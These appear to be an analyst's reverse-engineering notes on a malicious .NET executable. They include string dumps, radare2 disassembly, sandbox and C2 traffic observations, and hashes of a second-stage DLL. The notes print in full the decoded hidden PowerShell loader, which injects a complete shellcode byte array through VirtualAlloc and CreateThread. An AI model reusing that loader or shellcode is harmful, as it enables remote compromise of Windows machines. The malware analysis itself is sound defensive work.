vaddr=0x0040223a paddr=0x0000043a ordinal=022 sz=32 len=31 section=.text type=ascii string=System.Runtime.CompilerServices
vaddr=0x0040225a paddr=0x0000045a ordinal=023 sz=9 len=8 section=.text type=ascii string=mscorlib
vaddr=0x00402263 paddr=0x00000463 ordinal=024 sz=24 len=23 section=.text type=ascii string=csharpandpowershell.exe
vaddr=0x0040227f paddr=0x0000047f ordinal=025 sz=4090 len=2045 section=.text type=utf16le string=powershell -window hidden -EncodedCommand JAB...AB
vaddr=0x00403279 paddr=0x00001479 ordinal=026 sz=4090 len=2045 section=.text type=utf16le string=4A...MA
vaddr=0x00404273 paddr=0x00002473 ordinal=027 sz=4090 len=2045 section=.text type=utf16le string=Yw...B9A
vaddr=0x0040526d paddr=0x0000346d ordinal=028 sz=1698 len=848 section=.text type=utf16le string=Ds...==였꽆쑜镨멁 blocks=Basic Latin,Hangul Syllables,CJK Unified Ideographs
vaddr=0x0040590f paddr=0x00003b0f ordinal=029 sz=6 len=5 section=.text type=ascii string=n'W]7
vaddr=0x0040592a paddr=0x00003b2a ordinal=030 sz=23 len=22 section=.text type=ascii string=WrapNonExceptionThrows
vaddr=0x00405982 paddr=0x00003b82 ordinal=031 sz=12 len=11 section=.text type=ascii string=_CorExeMain
vaddr=0x0040598e paddr=0x00003b8e ordinal=032 sz=12 len=11 section=.text type=ascii string=mscoree.dll
vaddr=0x00406062 paddr=0x00003c62 ordinal=033 sz=28 len=13 section=.rsrc type=utf16le string=_VERSION_INFO
vaddr=0x004060bc paddr=0x00003cbc ordinal=034 sz=22 len=10 section=.rsrc type=utf16le string=arFileInfo
vaddr=0x004060da paddr=0x00003cda ordinal=035 sz=24 len=11 section=.rsrc type=utf16le string=Translation
vaddr=0x004060fe paddr=0x00003cfe ordinal=036 sz=30 len=14 section=.rsrc type=utf16le string=StringFileInfo
vaddr=0x00406122 paddr=0x00003d22 ordinal=037 sz=18 len=8 section=.rsrc type=utf16le string=007f04b0
vaddr=0x0040613a paddr=0x00003d3a ordinal=038 sz=18 len=8 section=.rsrc type=utf16le string=Comments
vaddr=0x00406158 paddr=0x00003d58 ordinal=039 sz=22 len=10 section=.rsrc type=utf16le string=ompanyName
vaddr=0x0040617c paddr=0x00003d7c ordinal=040 sz=30 len=14 section=.rsrc type=utf16le string=ileDescription
vaddr=0x004061a6 paddr=0x00003da6 ordinal=041 sz=24 len=11 section=.rsrc type=utf16le string=FileVersion
vaddr=0x004061c0 paddr=0x00003dc0 ordinal=042 sz=16 len=7 section=.rsrc type=utf16le string=0.0.0.0
vaddr=0x004061d6 paddr=0x00003dd6 ordinal=043 sz=26 len=12 section=.rsrc type=utf16le string=InternalName
vaddr=0x004061f0 paddr=0x00003df0 ordinal=044 sz=40 len=19 section=.rsrc type=utf16le string=csharpandpowershell
vaddr=0x0040621e paddr=0x00003e1e ordinal=045 sz=30 len=14 section=.rsrc type=utf16le string=LegalCopyright
vaddr=0x00406248 paddr=0x00003e48 ordinal=046 sz=30 len=14 section=.rsrc type=utf16le string=egalTrademarks
vaddr=0x00406272 paddr=0x00003e72 ordinal=047 sz=34 len=16 section=.rsrc type=utf16le string=OriginalFilename
vaddr=0x00406294 paddr=0x00003e94 ordinal=048 sz=48 len=23 section=.rsrc type=utf16le string=csharpandpowershell.exe
vaddr=0x004062ca paddr=0x00003eca ordinal=049 sz=24 len=11 section=.rsrc type=utf16le string=ProductName
vaddr=0x004062f0 paddr=0x00003ef0 ordinal=050 sz=28 len=13 section=.rsrc type=utf16le string=roductVersion

; note
payload appears to be powershell payload with base64

; not valid length by itself
JAB...AMAB

; collecting base64 strings together
JAB...==

; writing decoded base64 to file
open('resumebase64.decoded','wb').write("""JAB...==""".decode('base64'))

; strings from decoded base64
rabin2 -zz resumebase64.decoded
vaddr=0x00000000 paddr=0x00000000 ordinal=000 sz=4090 len=2045 section=unknown type=utf16le string=$E2yZ = '$BVJ = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type -memberDefinition $BVJ -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$z = 0xd9,0xe9,0xba,0x34,0x68,0x34,0x36,0xd9,0x74,0x24,0xf4,0x5e,0x33,0xc9,0xb1,0x47,0x31,0x56,0x18,0x83,0xc6,0x04,0x03,0x56,0x20,0x8a,0xc1,0xca,0xa0,0xc8,0x2a,0x33,0x30,0xad,0xa3,0xd6,0x01,0xed,0xd0,0x93,0x31,0xdd,0x93,0xf6,0xbd,0x96,0xf6,0xe2,0x36,0xda,0xde,0x05,0xff,0x51,0x39,0x2b,0x00,0xc9,0x79,0x2a,0x82,0x10,0xae,0x8c,0xbb,0xda,0xa3,0xcd,0xfc,0x07,0x49,0x9f,0x55,0x43,0xfc,0x30,0xd2,0x19,0x3d,0xba,0xa8,0x8c,0x45,0x5f,0x78,0xae,0x64,0xce,0xf3,0xe9,0xa6,0xf0,0xd0,0x81,0xee,0xea,0x35,0xaf,0xb9,0x81,0x8d,0x5b,0x38,0x40,0xdc,0xa4,0x97,0xad,0xd1,0x56,0xe9,0xea,0xd5,0x88,0x9c,0x02,0x26,0x34,0xa7,0xd0,0x55,0xe2,0x22,0xc3,0xfd,0x61,0x94,0x2f,0xfc,0xa6,0x43,0xbb,0xf2,0x03,0x07,0xe3,0x16,0x95,0xc4,0x9f,0x22,0x1e,0xeb,0x4f,0xa3,0x64,0xc8,0x4b,0xe8,0x3f,0x71,0xcd,0x54,0x91,0x8e,0x0d,0x37,0x4e,0x2b,0x45,0xd5,0x9b,0x46,0x04,0xb1,0x68,0x6b,0xb7,0x41,0xe7,0xfc,0xc4,0x73,0xa8,0x56,0x43,0x3f,0x21,0x71,0x94,0x40,0x18,0xc5,0x0a,0xbf,0xa3,0x36,0x02,0x7b,0xf7,0x66,0x3c,0xaa,0x78,0xed,0xbc,0x53,0xad,0x98,0xb6,0xc3,0x96,0x6a,0x77,0x71,0x4f,0x97,0x77,0x56,0xbf,0x1e,0x91,0xc8,0xef,0x70,0x0e,0xa8,0x5f,0x31,0xfe,0x40,0x8a,0xbe,0x21,0x70,0xb5,0x14,0x4a,0x1a,0x5a,0xc1,0x22,0xb2,0xc3,0x48,0xb8,0x23,0x0b,0x47,0xc4,0x63,0x87,0x64,0x38,0x2d,0x60,0x00,0x2a,0xd9,0x80,0x5f,0x10,0x4f,0x9e,0x75,0x3f,0x6f,0x0a,0x72,0x96,0x38,0xa2,0x78,0xcf,0x0e,0x6d,0x82,0x3a,0x05,0xa4,0x16,0x85,0x71,0xc9,0xf6,0x05,0x81,0x9f,0x9c,0x05,0xe9,0x47,0xc5,0x55,0x0c,0x88,0xd0,0xc9,0x9d,0x1d,0xdb,0xbb,0x72,0xb5,0xb3,0x41,0xad,
vaddr=0x00000ffa paddr=0x00000ffa ordinal=001 sz=1110 len=555 section=unknown type=utf16le string=0xf1,0x1b,0xb9,0x98,0x03,0x67,0x6c,0xe4,0x71,0x89,0xac;$g = 0x1000;if ($z.Length -gt 0x1000){$g = $z.Length};$0dX3=$w::VirtualAlloc(0,0x1000,$g,0x40);for ($i=0;$i -le ($z.Length-1);$i++) {$w::memset([IntPtr]($0dX3.ToInt32()+$i), $z[$i], 1)};$w::CreateThread(0,0,$0dX3,0,0,0);for (;;){Start-sleep 60};';$e = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($E2yZ));$iS0 = "-enc ";if([IntPtr]::Size -eq 8){$BzQ = $env:SystemRoot + "\syswow64\WindowsPowerShell\v1.0\powershell";iex "& $BzQ $iS0 $e"}else{;iex "& powershell $iS0 $e";}

; Investigating powershell
$E2yZ = '$BVJ = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type -memberDefinition $BVJ -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$z = 0xd9,0xe9,0xba,0x34,0x68,0x34,0x36,0xd9,0x74,0x24,0xf4,0x5e,0x33,0xc9,0xb1,0x47,0x31,0x56,0x18,0x83,0xc6,0x04,0x03,0x56,0x20,0x8a,0xc1,0xca,0xa0,0xc8,0x2a,0x33,0x30,0xad,0xa3,0xd6,0x01,0xed,0xd0,0x93,0x31,0xdd,0x93,0xf6,0xbd,0x96,0xf6,0xe2,0x36,0xda,0xde,0x05,0xff,0x51,0x39,0x2b,0x00,0xc9,0x79,0x2a,0x82,0x10,0xae,0x8c,0xbb,0xda,0xa3,0xcd,0xfc,0x07,0x49,0x9f,0x55,0x43,0xfc,0x30,0xd2,0x19,0x3d,0xba,0xa8,0x8c,0x45,0x5f,0x78,0xae,0x64,0xce,0xf3,0xe9,0xa6,0xf0,0xd0,0x81,0xee,0xea,0x35,0xaf,0xb9,0x81,0x8d,0x5b,0x38,0x40,0xdc,0xa4,0x97,0xad,0xd1,0x56,0xe9,0xea,0xd5,0x88,0x9c,0x02,0x26,0x34,0xa7,0xd0,0x55,0xe2,0x22,0xc3,0xfd,0x61,0x94,0x2f,0xfc,0xa6,0x43,0xbb,0xf2,0x03,0x07,0xe3,0x16,0x95,0xc4,0x9f,0x22,0x1e,0xeb,0x4f,0xa3,0x64,0xc8,0x4b,0xe8,0x3f,0x71,0xcd,0x54,0x91,0x8e,0x0d,0x37,0x4e,0x2b,0x45,0xd5,0x9b,0x46,0x04,0xb1,0x68,0x6b,0xb7,0x41,0xe7,0xfc,0xc4,0x73,0xa8,0x56,0x43,0x3f,0x21,0x71,0x94,0x40,0x18,0xc5,0x0a,0xbf,0xa3,0x36,0x02,0x7b,0xf7,0x66,0x3c,0xaa,0x78,0xed,0xbc,0x53,0xad,0x98,0xb6,0xc3,0x96,0x6a,0x77,0x71,0x4f,0x97,0x77,0x56,0xbf,0x1e,0x91,0xc8,0xef,0x70,0x0e,0xa8,0x5f,0x31,0xfe,0x40,0x8a,0xbe,0x21,0x70,0xb5,0x14,0x4a,0x1a,0x5a,0xc1,0x22,0xb2,0xc3,0x48,0xb8,0x23,0x0b,0x47,0xc4,0x63,0x87,0x64,0x38,0x2d,0x60,0x00,0x2a,0xd9,0x80,0x5f,0x10,0x4f,0x9e,0x75,0x3f,0x6f,0x0a,0x72,0x96,0x38,0xa2,0x78,0xcf,0x0e,0x6d,0x82,0x3a,0x05,0xa4,0x16,0x85,0x71,0xc9,0xf6,0x05,0x81,0x9f,0x9c,0x05,0xe9,0x47,0xc5,0x55,0x0c,0x88,0xd0,0xc9,0x9d,0x1d,0xdb,0xbb,0x72,0xb5,0xb3,0x41,0xad,0xf1,0x1b,0xb9,0x98,0x03,0x67,0x6c,0xe4,0x71,0x89,0xac;$g = 0x1000;if ($z.Length -gt 0x1000){$g = $z.Length};$0dX3=$w::VirtualAlloc(0,0x1000,$g,0x40);for ($i=0;$i -le ($z.Length-1);$i++) {$w::memset([IntPtr]($0dX3.ToInt32()+$i), $z[$i], 1)};$w::CreateThread(0,0,$0dX3,0,0,0);for (;;){Start-sleep 60};';$e = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($E2yZ));$iS0 = "-enc ";if([IntPtr]::Size -eq 8){$BzQ = $env:SystemRoot + "\syswow64\WindowsPowerShell\v1.0\powershell";iex "& $BzQ $iS0 $e"}else{;iex "& powershell $iS0 $e";}

; saving hex as binary file
open('resumehex.bin','wb').write("0xd9,...0xac".replace(',','').replace('0x','').replace(' ','').decode('hex'))

; radare from bin 
[0x00000000]> pD
            0x00000000      d9e9           fldl2t
            0x00000002      ba34683436     mov edx, 0x36346834
       :    0x00000007      d97424f4       fnstenv dword [rsp - 0xc]
       :    0x0000000b      5e             pop rsi
       :    0x0000000c      33c9           xor ecx, ecx
       :    0x0000000e      b147           mov cl, 0x47                ; 'G'
       :    0x00000010      315618         xor dword [rsi + 0x18], edx
       :    0x00000013      83c604         add esi, 4
       :    0x00000016      035620         add edx, dword [rsi + 0x20]
       :    0x00000019      8ac1           mov al, cl
       :    0x0000001b      caa0c8         retf -0x3760
       :    0x0000001e      2a33           sub dh, byte [rbx]
       :    0x00000020      30ada3d601ed   xor byte [rbp - 0x12fe295d], ch
       :    0x00000026      d09331dd93f6   rcl byte [rbx - 0x96c22cf], 1
       :    0x0000002c      bd96f6e236     mov ebp, 0x36e2f696
       :    0x00000031      dade           fcmovu st(0), st(6)
       :    0x00000033      05ff51392b     add eax, 0x2b3951ff
       :    0x00000038      00c9           add cl, cl
      ,===< 0x0000003a      792a           jns 0x66
      |:    0x0000003c      82             invalid
      |:    0x0000003d      10ae8cbbdaa3   adc byte [rsi - 0x5c254474], ch
      |:    0x00000043      cdfc           int 0xfc
      |:    0x00000045      07             invalid
      |:    0x00000046      499f           lahf
      |:    0x00000048      55             push rbp
      |:    0x00000049      43fc           cld
      |:    0x0000004b      30d2           xor dl, dl
      |:    0x0000004d      193dbaa88c45   sbb dword [0x458ca90d], edi
      |:    0x00000053      5f             pop rdi
      |`==< 0x00000054      78ae           js 4
      |.--> 0x00000056      64             invalid
      |:    0x00000057      ce             invalid
      |:,=< 0x00000058      f3e9a6f0d081   jmp 0xffffffff81d0f104
      |:|   0x0000005e      ee             out dx, al
      |:|   0x0000005f      ea             invalid
      |:|   0x00000060      35afb9818d     xor eax, 0x8d81b9af
      |:|   0x00000065      5b             pop rbx
      `---> 0x00000066      3840dc         cmp byte [rax - 0x24], al   ; [0x2:1]=186
       :|   0x00000069      a4             movsb byte [rdi], byte ptr [rsi]
       :|   0x0000006a      97             xchg eax, edi
       :|   0x0000006b      ad             lodsd eax, dword [rsi]
       :|   0x0000006c      d156e9         rcl dword [rsi - 0x17], 1
       :|   0x0000006f      ea             invalid
       :|   0x00000070      d5             invalid
       :|   0x00000071      889c022634a7.  mov byte [rdx + rax - 0x2f58cbda], bl
       :|   0x00000078      55             push rbp
       :,=< 0x00000079      e222           loop 0x9d
      :||   0x0000007b      c3             ret
      :||   0x0000007c      fd             std
      :||   0x0000007d      61             invalid
      :||   0x0000007e      94             xchg eax, esp
      :||   0x0000007f      2f             invalid
      :||   0x00000080      fc             cld
      :||   0x00000081      a6             cmpsb byte [rsi], byte ptr [rdi] ; [0x2700000000:1]=255 ; 167503724544
      :||   0x00000082      43bbf20307e3   mov r11d, 0xe30703f2
      :||   0x00000088      16             invalid                     ; 0xe30703f2
      :||   0x00000089      95             xchg eax, ebp
      :||   0x0000008a      c4             invalid
      :||   0x0000008b      9f             lahf
      :||   0x0000008c      221e           and bl, byte [rsi]
      ,===< 0x0000008e      eb4f           jmp 0xdf
     |:||   0x00000090      a364c84be83f.  movabs dword [0x54cd713fe84bc864], eax ; [0x54cd713fe84bc864:4]=-1
     |:||   0x00000099      91             xchg eax, ecx
     |:||   0x0000009a      8e0d374e2b45   mov cs, word [0x452b4ed7]   ; [0x452b4ed7:2]=0xffff
      |:|   0x000000a0      d5             invalid                     ; [0x452b4ed7:2]=0xffff
      |:|   0x000000a1      9b             wait
      |:|   0x000000a2      4604b1         add al, 0xb1
      |:|   0x000000a5      686bb741e7     push -0x18be4895
      |:|   0x000000aa      fc             cld
      |:|   0x000000ab      c4             invalid
      |`==< 0x000000ac      73a8           jae 0x56
      | |   0x000000ae      56             push rsi
      | |   0x000000af      43             invalid
      | .-> 0x000000b0      3f             invalid
     | :|   0x000000b1      217194         and dword [rcx - 0x6c], esi
     | :|   0x000000b4      4018c5         sbb bpl, al
     | :|   0x000000b7      0abfa336027b   or bh, byte [rdi + 0x7b0236a3]
     | :|   0x000000bd      f7663c         mul dword [rsi + 0x3c]
     | :|   0x000000c0      aa             stosb byte [rdi], al
      | `=< 0x000000c1      78ed           js 0xb0
      | |   0x000000c3      bc53ad98b6     mov esp, 0xb698ad53
      | |   0x000000c8      c3             ret
      | |   0x000000c9      96             xchg eax, esi
      | |   0x000000ca      6a77           push 0x77                   ; 'w'
      | ,=< 0x000000cc      714f           jno 0x11d
     | ||   0x000000ce      97             xchg eax, edi
      |,==< 0x000000cf      7756           ja 0x127
     ||||   0x000000d1      bf1e91c8ef     mov edi, 0xefc8911e
     ,====< 0x000000d6      700e           jo 0xe6
    |||||   0x000000d8      a85f           test al, 0x5f               ; '_'
    |||||   0x000000da      31fe           xor esi, edi
    |||||   0x000000dc      408abe2170b5.  mov dil, byte [rsi + 0x14b57021] ; [0x14b57021:1]=255
    | |||   0x000000e3      4a1a5ac1       sbb bl, byte [rdx - 0x3f]
      |||   0x000000e7      22b2c348b823   and dh, byte [rdx + 0x23b848c3]
      |||   0x000000ed      0b47c4         or eax, dword [rdi - 0x3c]
      |||   0x000000f0      63             invalid
      |||   0x000000f1      8764382d       xchg dword [rax + rdi + 0x2d], esp
      |||   0x000000f5      60             invalid
      |||   0x000000f6      002a           add byte [rdx], ch
      |||   0x000000f8      d9805f104f9e   fld dword [rax - 0x61b0efa1]
      ,===< 0x000000fe      753f           jne 0x13f

; changed to 32 bit
radare2 -b 32 resumehex.bin
[0x00000000]> pD
            0x00000000      d9e9           fldl2t
            0x00000002      ba34683436     mov edx, 0x36346834
      :     0x00000007      d97424f4       fnstenv dword [esp - 0xc]
      :     0x0000000b      5e             pop esi
      :     0x0000000c      33c9           xor ecx, ecx
      :     0x0000000e      b147           mov cl, 0x47                ; 'G'
      :     0x00000010      315618         xor dword [esi + 0x18], edx
      :     0x00000013      83c604         add esi, 4
      :     0x00000016      035620         add edx, dword [esi + 0x20]
      :     0x00000019      8ac1           mov al, cl
      :     0x0000001b      caa0c8         retf -0x3760
      :     0x0000001e      2a33           sub dh, byte [ebx]
      :     0x00000020      30ada3d601ed   xor byte [ebp - 0x12fe295d], ch
      :     0x00000026      d09331dd93f6   rcl byte [ebx - 0x96c22cf], 1
      :     0x0000002c      bd96f6e236     mov ebp, 0x36e2f696
      :     0x00000031      dade           fcmovu st(0), st(6)
      :     0x00000033      05ff51392b     add eax, 0x2b3951ff
      :     0x00000038      00c9           add cl, cl
     ,====< 0x0000003a      792a           jns 0x66
     |:     0x0000003c      82             invalid
     |:     0x0000003d      10ae8cbbdaa3   adc byte [esi - 0x5c254474], ch
     |:     0x00000043      cdfc           int 0xfc
     |:     0x00000045      07             pop es
     |:     0x00000046      49             dec ecx
     |:     0x00000047      9f             lahf
     |:     0x00000048      55             push ebp
     |:     0x00000049      43             inc ebx
     |:     0x0000004a      fc             cld
     |:     0x0000004b      30d2           xor dl, dl
     |:     0x0000004d      193dbaa88c45   sbb dword [0x458ca8ba], edi
     |:     0x00000053      5f             pop edi
     |`===< 0x00000054      78ae           js 4
     |      0x00000056      64ce           into
     | ,==< 0x00000058      f3e9a6f0d081   jmp 0x81d0f104
     | |    0x0000005e      ee             out dx, al
     | |,=< 0x0000005f      ea35afb9818d.  ljmp 0x5b8d:0x81b9af35
     `----> 0x00000066      3840dc         cmp byte [eax - 0x24], al   ; [0x2:1]=186
      |:|   0x00000069      a4             movsb byte es:[edi], byte ptr [esi]
      |:|   0x0000006a      97             xchg eax, edi
      |:|   0x0000006b      ad             lodsd eax, dword [esi]
      |:|   0x0000006c      d156e9         rcl dword [esi - 0x17], 1
       ,==< 0x0000006f      ead5889c0226.  ljmp 0x3426:0x29c88d5
     ||:|   0x00000076      a7             cmpsd dword [esi], dword ptr es:[edi] ; [0x170000001c:4]=-1 ; 98784247836
     ||:|   0x00000077      d055e2         rcl byte [ebp - 0x1e], 1
     ||:|   0x0000007a      22c3           and al, bl
     ||:|   0x0000007c      fd             std
     ||:|   0x0000007d      61             popal
     ||:|   0x0000007e      94             xchg eax, esp
     ||:|   0x0000007f      2f             das
     ||:|   0x00000080      fc             cld
     ||:|   0x00000081      a6             cmpsb byte [esi], byte ptr es:[edi] ; [0x170000001c:1]=255 ; 98784247836
     ||:|   0x00000082      43             inc ebx
     ||:|   0x00000083      bbf20307e3     mov ebx, 0xe30703f2
     ||:|   0x00000088      16             push ss
     ||:|   0x00000089      95             xchg eax, ebp
     ||:|   0x0000008a      c49f221eeb4f   les ebx, [edi + 0x4feb1e22]
     ||:|   0x00000090      a364c84be8     mov dword [0xe84bc864], eax ; [0xe84bc864:4]=-1
     ||:|   0x00000095      3f             aas
      ||`=< 0x00000096      71cd           jno 0x65
      |||   0x00000098      54             push esp
      |||   0x00000099      91             xchg eax, ecx
      |||   0x0000009a      8e0d374e2b45   mov cs, word [0x452b4e37]   ; [0x452b4e37:2]=0xffff
      |||   0x000000a0      d59b           aad 0x9b
      |||   0x000000a2      46             inc esi
      |||   0x000000a3      04b1           add al, 0xb1
      |||   0x000000a5      686bb741e7     push 0xe741b76b
      |||   0x000000aa      fc             cld
      |||   0x000000ab      c473a8         les esi, [ebx - 0x58]
      |||   0x000000ae      56             push esi
      |||   0x000000af      43             inc ebx
      ||.-> 0x000000b0      3f             aas
     ||:|   0x000000b1      217194         and dword [ecx - 0x6c], esi
     ||:|   0x000000b4      40             inc eax
     ||:|   0x000000b5      18c5           sbb ch, al
     ||:|   0x000000b7      0abfa336027b   or bh, byte [edi + 0x7b0236a3]
     ||:|   0x000000bd      f7663c         mul dword [esi + 0x3c]
     ||:|   0x000000c0      aa             stosb byte es:[edi], al
      ||`=< 0x000000c1      78ed           js 0xb0
      |||   0x000000c3      bc53ad98b6     mov esp, 0xb698ad53
      |||   0x000000c8      c3             ret
      |||   0x000000c9      96             xchg eax, esi
      |||   0x000000ca      6a77           push 0x77                   ; 'w' ; 119
      ||,=< 0x000000cc      714f           jno 0x11d
     ||||   0x000000ce      97             xchg eax, edi
      ,===< 0x000000cf      7756           ja 0x127
    |||||   0x000000d1      bf1e91c8ef     mov edi, 0xefc8911e
     ,====< 0x000000d6      700e           jo 0xe6
   ||||||   0x000000d8      a85f           test al, 0x5f               ; '_'
   ||||||   0x000000da      31fe           xor esi, edi
   ||||||   0x000000dc      40             inc eax
   ||||||   0x000000dd      8abe2170b514   mov bh, byte [esi + 0x14b57021] ; [0x14b57021:1]=255
   ||||||   0x000000e3      4a             dec edx
   ||||||   0x000000e4      1a5ac1         sbb bl, byte [edx - 0x3f]
    |||||   0x000000e7      22b2c348b823   and dh, byte [edx + 0x23b848c3]
    |||||   0x000000ed      0b47c4         or eax, dword [edi - 0x3c]
    |||||   0x000000f0      638764382d60   arpl word [edi + 0x602d3864], ax
    |||||   0x000000f6      002a           add byte [edx], ch
    |||||   0x000000f8      d9805f104f9e   fld dword [eax - 0x61b0efa1]
     ,====< 0x000000fe      753f           jne 0x13f

; because lazy and time
https://app.any.run/tasks/995eb5e3-4c5f-4c47-b849-67ff647c6387

; Connection data
(myserver):9008 -> exe came across
dumped entire pcap from c2 into file:
- file resumepcap.hexdump
--  resumepcap.hexdump: data
egrep -nor '[^ ]{30,}' resumepcap.stringsdump |grep string
1237:string=core_negotiate_tlv_encryption
1238:string=core_transport_set_timeouts
1239:string=core_transport_getcerthash
1240:string=core_transport_setcerthash
1261:string=\a\a\b\b\t\t\n\n\v\v\f\f\r\r
1382:string=InitializeCriticalSectionEx
1385:string=SetThreadStackGuarantee
1388:string=WaitForThreadpoolTimerCallbacks
1393:string=FlushProcessWriteBuffers
1394:string=FreeLibraryWhenCallbackReturns
1395:string=GetCurrentProcessorNumber
1396:string=GetLogicalProcessorInformation
1398:string=SetDefaultDllDirectories
1404:string=GetUserDefaultLocaleName
1409:string=GetFileInformationByHandleExW
1410:string=SetFileInformationByHandleW
1436:string=GetUserObjectInformationW
1437:string=GetProcessWindowStation
1770:string=QQ𥸸𥽼𦃀ᙏὫ峹巋O3ï澢漣瀻瀎潌滺殭歩樭栺损槎摲撋搹敷掊搔措揉敆檇憺抪戡拔曇晬暧晜暄栎枵枍曧杘朏晋昪欗棭榨梽硒砩礓禔穑𦅭𦅲𦠑𦆆𦆗𦆦𦆴𦇃𦇛𦇯𦈅𦈠𦈰𦈿𦉒𦉲𦊄𦊖𦊥𦋃𦋔𦋥𦋵𦌌𦌙𦌦𦍁𦍡𦍳𦎋𦎩𦎺𦏈𦏢𦏺𦐍𦐤𦐳𦑈𦑙𦑮𦒂𦒛𦒹𦓎𦓟𦓵𦔉𦔞𦔳𦕆𦕜𦕰𦖇𦖢𦖲𦗒𦗠𦗴𦘋𦘚𦘪𦘹𦙔𦙨𦙾𦚘𦚳𦛌𦛨𦜂𦜟𦜯𦝍𦝮𦝾𦞝𦞶𦟈𦟝𦟷𠁐
1773:string=packet_get_tlv_value_string
1774:string=packet_get_tlv_value_uint
1775:string=packet_get_tlv_value_wstring
1777:string=packet_is_tlv_null_terminated
1778:string=packet_remove_completion_handler
1780:string=packet_transmit_empty_response
1781:string=packet_transmit_response
1784:string=scheduler_insert_waitable
1785:string=scheduler_signal_waitable
1786:string=_scheduler_waitable_thread@4
1789:string=CertGetCertificateContextProperty
1813:string=WinHttpGetIEProxyConfigForCurrentUser
1826:string=SetUnhandledExceptionFilter
1856:string=GetProcessWindowStation
1857:string=GetUserObjectInformationW
1862:string=AllocateAndInitializeSid
1864:string=InitializeSecurityDescriptor
1865:string=SetSecurityDescriptorDacl
1866:string=SetSecurityDescriptorSacl
1873:string=CryptImportPublicKeyInfo
1895:string=CreateToolhelp32Snapshot
1903:string=GetSystemTimeAsFileTime
1908:string=IsProcessorFeaturePresent
1922:string=QueryPerformanceCounter
1924:string=FreeEnvironmentStringsW
1925:string=UnhandledExceptionFilter
1926:string=InitializeCriticalSectionAndSpinCount
1946:string=ImpersonateLoggedOnUser
2008:string=core_pivot_session_died
2028:string=\a\a\b\b\t\t\n\n\v\v\f\f\r\r
2056:string=\t\a\f\b\f\t\f\n\a\v\b\f
2061:string=abcdefghijklmnopqrstuvwxyz
2062:string=ABCDEFGHIJKLMNOPQRSTUVWXYZ
2064:string=abcdefghijklmnopqrstuvwxyz
2065:string=ABCDEFGHIJKLMNOPQRSTUVWXYZ
2147:string=6#6'6+6/63676;6/8N8m8r8
2183:string=3\a43494=4B4H4L4R4V4\4`4e4k4o4u4y4
2186:string=:\b:$:0:6:A:O:X:b:r:w:|:
2212:string=2$2*22272=2E2J2P2X2]2c2k2p2v2~2
2248:string=6<:@:D:H:L:P:T:X:\:`:d:h:
2255:string=:$:,:4:<:D:L:T:\:d:l:t:|:
2256:string=;$;,;4;<;D;L;T;\;d;l;t;|;
2257:string=<$<,<4<<<D<L<T<\<d<l<t<|<
2258:string==$=,=4=<=D=L=T=\=d=l=t=|=
2259:string=>$>,>4><>D>L>T>\>d>l>t>|>
2260:string=?$?,?4?<?D?L?T?\?d?l?t?|?
2261:string=0$0,040<0D0L0T0\0d0l0t0|0

; Got new binary / 2nd stage
binwalk -e resumepcap.hexdump
file _resumepcap.hexdump.extracted/4
_resumepcap.hexdump.extracted/4: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
md5sum _resumepcap.hexdump.extracted/4
eeb70c0bd145011062f0116738e10a5e  _resumepcap.hexdump.extracted/4
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d md5: eeb70c0bd145011062f0116738e10a5e
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d sha1: 295be71de968e22a14c2a0fb558d3295b4c2a7c3
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d sha256: 5baecac3ee5cf8f8f0d13d19c540310681abbc1e6978e397d077885d6c104b6f
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d sha384: 950bee417b6b6fa9bbdb4becbcba3b574a4d8d4201d6a089bd8bf4a566291d976f803331999cd46ed2c53c49bdeda973
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d sha512: aa15fb09b5e8a5b9904ef3582f28a521afc32a1f3771dec65e5699b08bcad2fbccfb43c1124987cc1d78ba8814a98c75f28ff73a82f7c125c5515f389c7d9cff
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d crc16: 4df2
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d crc32: c854733c
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d md4: db31d79e9eaddfc0a93e043d058c9ca0
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d xor: ae
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d xorpair: 54fa
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d parity: 01
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d entropy: 07000000
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d hamdist: 06
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d pcprint: 22
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d mod255: f6
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d xxhash: ae3757fa
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d adler32: 52af2f02
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d luhn: 03
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d crc8smbus: ef
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d crc15can: 759f
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d crc16hdlc: 270e
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d crc16usb: 2328
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d crc16citt: 8672
